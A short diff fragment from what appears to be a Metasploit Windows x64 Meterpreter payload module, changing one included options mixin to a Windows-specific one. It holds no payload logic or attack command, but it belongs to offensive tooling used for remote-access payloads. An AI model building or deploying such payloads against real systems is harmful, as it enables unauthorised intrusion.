@@ -12,7 +12,7 @@
 
 module MetasploitModule
   include Msf::Payload::Windows::MeterpreterLoader_x64
-  include Msf::Sessions::MeterpreterOptions
+  include Msf::Sessions::MeterpreterOptions::Windows
 
   def initialize(info = {})
     super(
